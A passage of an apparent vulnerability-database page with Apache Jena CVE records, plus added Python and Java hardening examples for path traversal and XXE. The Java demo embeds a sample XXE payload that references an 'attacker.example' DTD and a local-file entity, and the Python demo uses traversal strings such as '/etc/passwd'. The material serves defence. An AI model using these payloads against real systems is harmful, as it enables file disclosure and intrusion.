"description": "CWE-22 Improper Limitation of a Pathname to a Restricted Directory (\u0027Path Traversal\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-07-21T09:30:32.715Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/qmm21som8zct813vx6dfd1phnfro6mwq"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Apache Jena: Administrative users can create files outside the server directory space via the admin UI",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2025-49656",
"datePublished": "2025-07-21T09:30:32.715Z",
"dateReserved": "2025-06-09T16:47:05.868Z",
"dateUpdated": "2025-11-04T21:11:14.792Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
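CVE-2025-49656 (database files created outside the Fuseki files area) and CVE-2025-50151 (unvalidated file paths in uploaded configuration) are both instances of trusting an administrator-supplied path. The block below is an added example and not Fuseki code; it makes no claim about how Fuseki itself resolves paths. It contrasts the naive join behind CWE-22 with a containment check that resolves ".." segments, absolute paths and symlinks before comparing against the base directory. The "databases" directory and the attempted names are constructed for the demonstration.

```python
"""Path containment for admin-supplied database locations.

Added example for the CVE-2025-49656 / CVE-2025-50151 records; not Apache
Jena or Fuseki code, and no claim about Fuseki's own path handling. The
"databases" base directory is a temporary directory created for the demo.
"""
import os
import tempfile
from pathlib import Path


def naive_db_path(base, name):
    """The vulnerable pattern behind CWE-22: join and trust the result.
    os.path.join drops `base` entirely when `name` is absolute, and leaves
    '..' segments and symlinks for the filesystem to resolve later."""
    return os.path.join(base, name)


def contained_db_path(base, name):
    """Return base/name as a resolved Path only if it lies strictly inside
    base after '..' and symlink resolution; raise PermissionError otherwise."""
    if "\x00" in name:
        raise ValueError("NUL byte in path component")
    root = Path(base).resolve()
    # Resolve first, compare second: a check on the raw `name` would miss
    # symlinks and pathlib's absolute-path replacement.
    candidate = (root / name).resolve()
    if root not in candidate.parents:
        raise PermissionError(f"{name!r} resolves to {candidate}, outside {root}")
    return candidate


def demo():
    """Run both functions against a throwaway base directory and report,
    per attempt, whether the naive join escapes and whether the contained
    version accepts it. The directory layout is constructed for the demo."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        base = os.path.join(tmp, "databases")   # hypothetical Fuseki files area
        outside = os.path.join(tmp, "outside")
        os.mkdir(base)
        os.mkdir(outside)
        attempts = {
            "normal": "mydb",
            "traversal": "../outside/mydb",
            "absolute": "/etc/passwd",
        }
        try:
            os.symlink(outside, os.path.join(base, "link"))
            attempts["symlink"] = "link/mydb"
        except OSError:
            pass  # platform without symlink support: skip that case

        base_real = os.path.realpath(base)
        for label, name in attempts.items():
            naive_real = os.path.realpath(naive_db_path(base, name))
            escapes = not naive_real.startswith(base_real + os.sep)
            try:
                contained_db_path(base, name)
                accepted = True
            except (PermissionError, ValueError):
                accepted = False
            results[label] = {"naive_escapes": escapes, "contained_accepts": accepted}
    return results


if __name__ == "__main__":
    for label, outcome in demo().items():
        print(f"{label:10s} {outcome}")
```

The check deliberately rejects the base directory itself as well as anything outside it: a database must be a subdirectory, and allowing `""` or `"."` would let an upload overwrite the files area root. Resolving before comparing is what defeats the symlink case, which a string-prefix check on the unresolved name would pass.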
CVE-2023-32200 (GCVE-0-2023-32200)
Vulnerability from nvd – Published: 2023-07-12 07:49 – Updated: 2024-10-07 19:42
Title
Apache Jena: Exposure of execution in script engine expressions.
Summary
There are insufficient restrictions on called script functions in Apache Jena versions 4.8.0 and earlier. This allows a remote user to execute JavaScript via a SPARQL query. This issue affects Apache Jena from 3.7.0 through 4.8.0.
Severity
The CNA records no CVSS vector and rates the issue "important". CISA ADP vulnrichment supplies CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H (8.8, High).
CWE
- CWE-917 - Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
Assigner
apache (Apache Software Foundation)
References
| URL | Tags |
|---|---|
| https://www.cve.org/CVERecord?id=CVE-2023-22665 | related |
| https://lists.apache.org/thread/7hg0t2kws3fyr75dl7lll8389xzzc46z | vendor-advisory |
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Apache Software Foundation | Apache Jena | Affected: 3.7.0 through 4.8.0 inclusive (semver) |
Credits
s3gundo of Alibaba
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T15:10:23.901Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"related",
"x_transferred"
],
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22665"
},
{
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.apache.org/thread/7hg0t2kws3fyr75dl7lll8389xzzc46z"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:a:apache:jena:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "jena",
"vendor": "apache",
"versions": [
{
"lessThanOrEqual": "4.8.0",
"status": "affected",
"version": "3.7.0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-32200",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-10-07T19:41:36.847404Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-10-07T19:42:49.706Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "4.8.0",
"status": "affected",
"version": "3.7.0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "s3gundo of Alibaba"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "There is insufficient restrictions of called script functions in Apache Jena\n versions 4.8.0 and earlier. It allows a \nremote user to execute javascript via a SPARQL query.\u003cbr\u003e\u003cp\u003eThis issue affects Apache Jena: from 3.7.0 through 4.8.0.\u003c/p\u003e"
}
],
"value": "There is insufficient restrictions of called script functions in Apache Jena\n versions 4.8.0 and earlier. It allows a \nremote user to execute javascript via a SPARQL query.\nThis issue affects Apache Jena: from 3.7.0 through 4.8.0.\n\n"
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-917",
"description": "CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement (\u0027Expression Language Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-07-12T07:49:55.432Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"related"
],
"url": "https://www.cve.org/CVERecord?id=CVE-2023-22665"
},
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/7hg0t2kws3fyr75dl7lll8389xzzc46z"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Apache Jena: Exposure of execution in script engine expressions.",
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2023-32200",
"datePublished": "2023-07-12T07:49:55.432Z",
"dateReserved": "2023-05-04T12:49:34.610Z",
"dateUpdated": "2024-10-07T19:42:49.706Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-22665 (GCVE-0-2023-22665)
Vulnerability from nvd – Published: 2023-04-25 06:44 – Updated: 2025-02-13 16:44
Title
Apache Jena: Exposure of arbitrary execution in script engine expressions.
Summary
There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query.
Severity
No CVSS vector is recorded; the CNA's textual severity is "important".
CWE
- CWE-917 - Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection')
Assigner
apache (Apache Software Foundation)
References
| URL | Tags |
|---|---|
| https://lists.apache.org/thread/s0dmpsxcwqs57l4qfs415klkgmhdxq7s | vendor-advisory |
| http://www.openwall.com/lists/oss-security/2023/07/11/11 | |
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Apache Software Foundation | Apache Jena | Affected: all versions ≤ 4.7.0 (semver) |
Workarounds
Users not using custom scripted functions are advised to run Java 17 or later with no script engine added to the deployment.
Credits
L3yx of Syclover Security Team
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T10:13:49.886Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://lists.apache.org/thread/s0dmpsxcwqs57l4qfs415klkgmhdxq7s"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2023/07/11/11"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "4.7.0",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "reporter",
"value": "L3yx of Syclover Security Team"
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query."
}
],
"value": "There is insufficient checking of user queries in Apache Jena versions 4.7.0 and earlier, when invoking custom scripts. It allows a remote user to execute arbitrary javascript via a SPARQL query."
}
],
"metrics": [
{
"other": {
"content": {
"text": "important"
},
"type": "Textual description of severity"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-917",
"description": "CWE-917 Improper Neutralization of Special Elements used in an Expression Language Statement (\u0027Expression Language Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-07-11T20:06:23.134Z",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"vendor-advisory"
],
"url": "https://lists.apache.org/thread/s0dmpsxcwqs57l4qfs415klkgmhdxq7s"
},
{
"url": "http://www.openwall.com/lists/oss-security/2023/07/11/11"
}
],
"source": {
"discovery": "EXTERNAL"
},
"title": "Apache Jena: Exposure of arbitrary execution in script engine expressions.",
"workarounds": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "Users not using custom scripted functions are advised to run Java17 or later with no script engine added to the deployment."
}
],
"value": "Users not using custom scripted functions are advised to run Java17 or later with no script engine added to the deployment."
}
],
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2023-22665",
"datePublished": "2023-04-25T06:44:21.516Z",
"dateReserved": "2023-01-05T14:41:04.515Z",
"dateUpdated": "2025-02-13T16:44:03.940Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
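Each record above carries its affected range twice, once in the structured cna.affected entries and once in the free-text summary, and the two do not always agree: CVE-2021-39239's structured range is < 4.1.0 while its summary says "up to 4.1.0" and the fix is 4.2.0, and CVE-2022-28890's range ≤ 4.4.0 includes 4.2.x and 4.3.x, which its summary says do not allow external entities. The block below is an added example, not tooling from the CVE program or the Jena project: it evaluates an installed Jena version against the structured ranges copied from the records on this page, handling the lessThan and lessThanOrEqual forms and the non-numeric lower bounds ("0", "unspecified", and the product name that CVE-2022-28890 carries in its version field). Read its output together with the summaries for the two discrepancies just noted.

```python
"""Which of the Jena CVEs on this page apply to a given installed version?

Added example; not tooling from the CVE program or the Jena project. The
ranges below are copied from the cna.affected entries of the records on this
page. A missing or non-numeric lower bound ("0", "unspecified", or the product
name in CVE-2022-28890) is treated as "from the first release".
"""
import re

# Copied from the records on this page (cna.affected[].versions[]).
JENA_RECORDS = [
    {"cveId": "CVE-2025-50151",
     "versions": [{"version": "0", "lessThanOrEqual": "5.4.0", "status": "affected"}]},
    {"cveId": "CVE-2025-49656",
     "versions": [{"version": "0", "lessThanOrEqual": "5.4.0", "status": "affected"}]},
    {"cveId": "CVE-2023-32200",
     "versions": [{"version": "3.7.0", "lessThanOrEqual": "4.8.0", "status": "affected"}]},
    {"cveId": "CVE-2023-22665",
     "versions": [{"version": "0", "lessThanOrEqual": "4.7.0", "status": "affected"}]},
    {"cveId": "CVE-2022-28890",
     "versions": [{"version": "Apache Jena", "lessThanOrEqual": "4.4.0", "status": "affected"}]},
    {"cveId": "CVE-2021-39239",
     "versions": [{"version": "unspecified", "lessThan": "4.1.0", "status": "affected"}]},
]


def parse_version(text):
    """Leading dotted integers of a version string, or None if there are none.
    '4.9.1-SNAPSHOT' -> (4, 9, 1); '0' -> (0,); 'unspecified' -> None."""
    m = re.match(r"\s*v?(\d+(?:\.\d+)*)", text or "")
    return tuple(int(p) for p in m.group(1).split(".")) if m else None


def compare(a, b):
    """-1, 0 or 1; shorter tuples are zero-padded so that 4.1 == 4.1.0."""
    n = max(len(a), len(b))
    a, b = a + (0,) * (n - len(a)), b + (0,) * (n - len(b))
    return (a > b) - (a < b)


def entry_matches(installed, entry):
    """True if `installed` falls inside one versions[] entry of a record."""
    if entry.get("status", "affected") != "affected":
        return False
    start = parse_version(entry.get("version"))
    if start is not None and compare(installed, start) < 0:
        return False  # below the lower bound
    if "lessThan" in entry:
        return compare(installed, parse_version(entry["lessThan"])) < 0
    if "lessThanOrEqual" in entry:
        return compare(installed, parse_version(entry["lessThanOrEqual"])) <= 0
    return start is not None and compare(installed, start) == 0  # single version


def affecting_cves(installed_text, records=JENA_RECORDS):
    """CVE ids whose structured ranges include the installed version,
    in the order the records are listed."""
    installed = parse_version(installed_text)
    if installed is None:
        raise ValueError(f"cannot parse version {installed_text!r}")
    return [r["cveId"] for r in records
            if any(entry_matches(installed, e) for e in r["versions"])]


if __name__ == "__main__":
    for v in ("3.6.0", "4.1.0", "4.9.1", "5.4.0", "5.5.0"):
        print(v, affecting_cves(v))
```

For 4.1.0 the structured data excludes CVE-2021-39239 even though the summary and the 4.2.0 workaround say otherwise, which is exactly why the structured ranges should be a first filter and not the final word. A build string such as 4.9.1-SNAPSHOT is compared on its numeric prefix only.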
CVE-2022-28890 (GCVE-0-2022-28890)
Vulnerability from nvd – Published: 2022-05-05 08:40 – Updated: 2024-08-03 06:10
Title
Processing external DTDs
Summary
A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities.
Severity
No CVSS vector is recorded; the CNA's textual severity is "medium".
CWE
- XML External DTD vulnerability (no CWE id is assigned in the record)
Assigner
apache (Apache Software Foundation)
References
| URL | Tags |
|---|---|
| https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878 | x_refsource_MISC |
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Apache Software Foundation | Apache Jena | Affected: all versions ≤ 4.4.0 (custom); the summary states that 4.2.x and 4.3.x do not allow external entities |
Workarounds
Users are advised to upgrade to Apache Jena 4.5.0 or later.
Credits
Apache Jena would like to thank Feras Daragma, Avishag Shapira & Amit Laish (GE Digital, Cyber Security Lab) for their report.
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-03T06:10:56.881Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThanOrEqual": "4.4.0",
"status": "affected",
"version": "Apache Jena",
"versionType": "custom"
}
]
}
],
"credits": [
{
"lang": "en",
"value": "Apache Jena would like to thank Feras Daragma, Avishag Shapira \u0026 Amit Laish (GE Digital, Cyber Security Lab) for their report."
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities."
}
],
"metrics": [
{
"other": {
"content": {
"other": "medium"
},
"type": "unknown"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "XML External DTD vulnerability",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2022-05-05T08:40:09",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "Processing external DTDs",
"workarounds": [
{
"lang": "en",
"value": "Users are advised to upgrade to Apache Jena 4.5.0 or later."
}
],
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@apache.org",
"ID": "CVE-2022-28890",
"STATE": "PUBLIC",
"TITLE": "Processing external DTDs"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Apache Jena",
"version": {
"version_data": [
{
"version_affected": "\u003c=",
"version_name": "Apache Jena",
"version_value": "4.4.0"
}
]
}
}
]
},
"vendor_name": "Apache Software Foundation"
}
]
}
},
"credit": [
{
"lang": "eng",
"value": "Apache Jena would like to thank Feras Daragma, Avishag Shapira \u0026 Amit Laish (GE Digital, Cyber Security Lab) for their report."
}
],
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "A vulnerability in the RDF/XML parser of Apache Jena allows an attacker to cause an external DTD to be retrieved. This issue affects Apache Jena version 4.4.0 and prior versions. Apache Jena 4.2.x and 4.3.x do not allow external entities."
}
]
},
"generator": {
"engine": "Vulnogram 0.0.9"
},
"impact": [
{
"other": "medium"
}
],
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "XML External DTD vulnerability"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878",
"refsource": "MISC",
"url": "https://lists.apache.org/thread/h88oh642455wljo0p5jgzs9phk4gj878"
}
]
},
"source": {
"discovery": "UNKNOWN"
},
"work_around": [
{
"lang": "en",
"value": "Users are advised to upgrade to Apache Jena 4.5.0 or later."
}
]
}
}
},
"cveMetadata": {
"assignerOrgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"assignerShortName": "apache",
"cveId": "CVE-2022-28890",
"datePublished": "2022-05-05T08:40:09",
"dateReserved": "2022-04-09T00:00:00",
"dateUpdated": "2024-08-03T06:10:56.881Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2021-39239 (GCVE-0-2021-39239)
Vulnerability from nvd – Published: 2021-09-16 14:40 – Updated: 2024-08-04 02:06
Title
XML External Entity (XXE) vulnerability
Summary
A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server.
Severity ?
No CVSS data available (the Apache CNA records only a non-CVSS "other" rating of "high" in the metrics below).
CWE
- XML External Entity (XXE) vulnerability
Assigner
apache
References
| URL | Tags |
|---|---|
| https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E | x_refsource_MISC |
| https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cannounce.apache.org%3E | mailing-list, x_refsource_MLIST |
| https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45%40%3Cdev.jena.apache.org%3E | mailing-list, x_refsource_MLIST |
| https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d%40%3Cdev.jena.apache.org%3E | mailing-list, x_refsource_MLIST |
Impacted products
| Vendor | Product | Version |
|---|---|---|
| Apache Software Foundation | Apache Jena | unspecified, < 4.1.0 (custom) |

Note that the affected-version range in the record ("< 4.1.0") does not match the summary ("versions up to 4.1.0") or the workaround (upgrade to 4.2.0). Treat 4.1.0 itself as affected and 4.2.0 as the first fixed release.
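Both of the records above, CVE-2022-28890 (external DTD retrieval in the RDF/XML parser) and CVE-2021-39239 (XXE in XML processing), come down to the same parser-level mistake: a DOCTYPE is accepted and the external references it declares are followed. The Java program below is an added illustration and is not Jena code, nor Apache's fix for either CVE; it assumes the JDK's bundled SAX parser (Xerces) at its default settings, and the sample RDF/XML document, the placeholder host name, the file path and all class and method names are constructed for the demonstration. It parses the same document twice, once with a default SAXParserFactory and once with a hardened one, and uses an EntityResolver that records every external resource the parser asks for instead of fetching it, so the test runs offline and never touches the network or the file system.

```java
import java.io.IOException;
import java.io.StringReader;
import java.util.ArrayList;
import java.util.List;

import javax.xml.XMLConstants;
import javax.xml.parsers.ParserConfigurationException;
import javax.xml.parsers.SAXParserFactory;

import org.xml.sax.EntityResolver;
import org.xml.sax.InputSource;
import org.xml.sax.SAXException;
import org.xml.sax.XMLReader;
import org.xml.sax.helpers.DefaultHandler;

public class RdfXmlDtdDemo {

    // Constructed sample: RDF/XML carrying an external DTD reference and an
    // external general entity. Host name and file path are placeholders.
    static final String RDF_WITH_DTD =
        "<?xml version=\"1.0\"?>\n"
      + "<!DOCTYPE rdf:RDF SYSTEM \"http://attacker.example/evil.dtd\" [\n"
      + "  <!ENTITY leak SYSTEM \"file:///etc/hostname\">\n"
      + "]>\n"
      + "<rdf:RDF xmlns:rdf=\"http://www.w3.org/1999/02/22-rdf-syntax-ns#\"\n"
      + "         xmlns:ex=\"http://example.org/\">\n"
      + "  <rdf:Description rdf:about=\"http://example.org/thing\">\n"
      + "    <ex:label>&leak;</ex:label>\n"
      + "  </rdf:Description>\n"
      + "</rdf:RDF>\n";

    /** Records each external resource the parser asks for; never fetches it. */
    static final class RecordingResolver implements EntityResolver {
        final List<String> requested = new ArrayList<>();

        @Override
        public InputSource resolveEntity(String publicId, String systemId) {
            requested.add(systemId);
            // Hand back an empty document so parsing continues without any I/O.
            return new InputSource(new StringReader(""));
        }
    }

    /** Default JDK SAX configuration: loads the external DTD and expands external entities. */
    static XMLReader defaultReader() throws ParserConfigurationException, SAXException {
        return SAXParserFactory.newInstance().newSAXParser().getXMLReader();
    }

    /** Hardened configuration: reject any DOCTYPE, so nothing external can ever be referenced. */
    static XMLReader hardenedReader() throws ParserConfigurationException, SAXException {
        SAXParserFactory f = SAXParserFactory.newInstance();
        f.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
        f.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
        // Belt and braces for a parser that must accept a DOCTYPE but not follow references:
        f.setFeature("http://xml.org/sax/features/external-general-entities", false);
        f.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
        f.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
        f.setXIncludeAware(false);
        return f.newSAXParser().getXMLReader();
    }

    /** Parses the sample with the given reader and returns the external resources it tried to load. */
    static List<String> parseAndRecord(XMLReader reader) throws IOException {
        RecordingResolver resolver = new RecordingResolver();
        reader.setEntityResolver(resolver);
        reader.setContentHandler(new DefaultHandler());
        try {
            reader.parse(new InputSource(new StringReader(RDF_WITH_DTD)));
        } catch (SAXException e) {
            // The hardened reader lands here: the DOCTYPE is rejected before any reference is resolved.
            System.out.println("parse rejected: " + e.getMessage());
        }
        return resolver.requested;
    }

    public static void main(String[] args) throws Exception {
        System.out.println("default parser requested:  " + parseAndRecord(defaultReader()));
        System.out.println("hardened parser requested: " + parseAndRecord(hardenedReader()));
    }
}
```

With the JDK defaults the first line lists both the DTD URL and the file URL, which is exactly the "retrieve an external DTD" and "expose local files" behaviour the two records describe; the hardened reader lists nothing because the DOCTYPE is refused outright. Two caveats: disallow-doctype-decl also rejects benign documents that use an internal subset for entity shorthand, so check your own RDF/XML inputs before enabling it, and this is generic parser hardening for code you control, not a substitute for the upgrades the records name (Jena 4.2.0 for CVE-2021-39239, 4.5.0 for CVE-2022-28890), since Jena's parser configuration lives inside the library.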
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-04T02:06:40.799Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E"
},
{
"name": "[announce] 20210916 CVE-2021-39239: Apache Jena: XML External Entity (XXE) vulnerability",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cannounce.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 Re: CVE-2021-39239 notifications for Jena 4.2.0",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45%40%3Cdev.jena.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 CVE-2021-39239 notifications for Jena 4.2.0",
"tags": [
"mailing-list",
"x_refsource_MLIST",
"x_transferred"
],
"url": "https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d%40%3Cdev.jena.apache.org%3E"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Apache Jena",
"vendor": "Apache Software Foundation",
"versions": [
{
"lessThan": "4.1.0",
"status": "affected",
"version": "unspecified",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability in XML processing in Apache Jena, in versions up to 4.1.0, may allow an attacker to execute XML External Entities (XXE), including exposing the contents of local files to a remote server."
}
],
"metrics": [
{
"other": {
"content": {
"other": "high"
},
"type": "unknown"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "XML External Entity (XXE) vulnerability",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2021-09-21T09:06:18",
"orgId": "f0158376-9dc2-43b6-827c-5f631a4d8d09",
"shortName": "apache"
},
"references": [
{
"tags": [
"x_refsource_MISC"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cusers.jena.apache.org%3E"
},
{
"name": "[announce] 20210916 CVE-2021-39239: Apache Jena: XML External Entity (XXE) vulnerability",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/rf44d529c54ef1d0097e813f576a0823a727e1669a9f610d3221d493d%40%3Cannounce.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 Re: CVE-2021-39239 notifications for Jena 4.2.0",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/r0f03ae7e102c3e8587fdd36531fc167309335738156dfbd7d9c1bf45%40%3Cdev.jena.apache.org%3E"
},
{
"name": "[jena-dev] 20210921 CVE-2021-39239 notifications for Jena 4.2.0",
"tags": [
"mailing-list",
"x_refsource_MLIST"
],
"url": "https://lists.apache.org/thread.html/rce5241b228a1f0e5880f6b2bfdb7ae9ee420e94cb692738a0bbfed9d%40%3Cdev.jena.apache.org%3E"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "XML External Entity (XXE) vulnerability",
"workarounds": [
{
"lang": "en",
"value": "Users are advised to upgrade to Apache Jena 4.2.0 or later."
}
],
"x_generator": {
"engine": "Vulnogram 0.0.9"
},
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "security@apache.org",
"ID": "CVE-2021-39239",
"STATE": "PUBLIC",
"TITLE": "XML External Entity (XXE) vulnerability"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "Apache Jena",
"version": {
"version_data": [
{
"version_affected": "\u003c",
"version_value": "4.1.0"
}
]
}
}
]
},
"vendor_name": "Apache Software Foundation"
}
]
}
},
"data_format": "MITRE",
